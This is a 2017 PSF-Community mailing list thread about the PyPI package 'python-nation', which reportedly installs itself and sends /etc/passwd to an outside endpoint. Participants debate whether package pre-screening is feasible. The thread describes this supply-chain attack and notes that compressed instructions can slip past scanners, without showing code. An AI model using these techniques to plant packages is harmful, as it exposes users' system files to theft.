This is not a solvable problem. IMNSHO We should never attempt to implement
pre screening of packages.

It is a good post-package-upload task for someone to try and do as a
research project.

Automated code scanning can only find already known things and similar
signatures (at which point it can have false positives) and we aren't just
talking about obfuscated source code.  PyPI hosts binary wheels made using
unreproduceable build processes on untrusted machines created from
unverifiable inputs.  Scanning services such as Google's
https://www.virustotal.com/en/about/ exist but I'm not sure that'd be of
much value to PyPI.

-gps

On Thu, May 4, 2017 at 7:28 PM Ryan Birmingham <rainventi...@gmail.com>
wrote:

> I'm not sure what effective package review would look like here. Perhaps
> we could establish an entity to screen packages on an opt-in basis, but I
> don't know if we have the resources/people for this. Automated code
> screening could and probably would miss the python nation example due to
> the unorthodox use of compressed instructions.
> Does anyone have any ideas?
>
> -Ryan Birmingham
>
> On 4 May 2017 at 20:08, Bruno Rocha <rochacbr...@gmail.com> wrote:
>
>> Interesting detail, the mentioned package
>> https://pypi.python.org/pypi/python-nation/1.0.1 was created and
>> uploaded by Jacob Kaplan Moss, so I guess this is intended to be a POC, to
>> show PyPI vulnerabilities or some Infosec experiment.
>>
>> On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbr...@gmail.com>
>> wrote:
>>
>>> Hi,
>>>
>>> I just read this on reddit[0], a thread asking if PyPI packages are
>>> audited and somebody pointed the `python-nation`[1] which is a harmful and
>>> useless module, installing itself and sending the `/etc/passwd` content to
>>> external endpoint.
>>>
>>> The app receiving the data is hosted at
>>> http://python-nation.herokuapp.com
>>>
>>> and as the PSF mission [2] says
>>>
>>> The mission of the Python Software Foundation is to promote, protect,
>>> and advance the Python programming language
>>>
>>> I wonder if there are some workgroup at PSF to handle this? and not only
>>> the specific case of `python-nation` which should be deleted and the user
>>> banned maybe, But also to handle the audit of other packages?
>>>
>>>
>>> [0]
>>> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
>>> [1]
>>> https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
>>> [2] https://www.python.org/psf/mission/
>>>
>>>
>>> Cheers,
>>>
>>> --
>>>
>>> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
>>> http://brunorocha.org
>>>
>>>
>>
>>
>> --
>>
>> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
>> http://brunorocha.org
>>
>>
>> _______________________________________________
>> PSF-Community mailing list
>> PSF-Community@python.org
>> https://mail.python.org/mailman/listinfo/psf-community
>>
>>
> _______________________________________________
> PSF-Community mailing list
> PSF-Community@python.org
> https://mail.python.org/mailman/listinfo/psf-community
>
_______________________________________________
PSF-Community mailing list
PSF-Community@python.org
https://mail.python.org/mailman/listinfo/psf-community

Reply via email to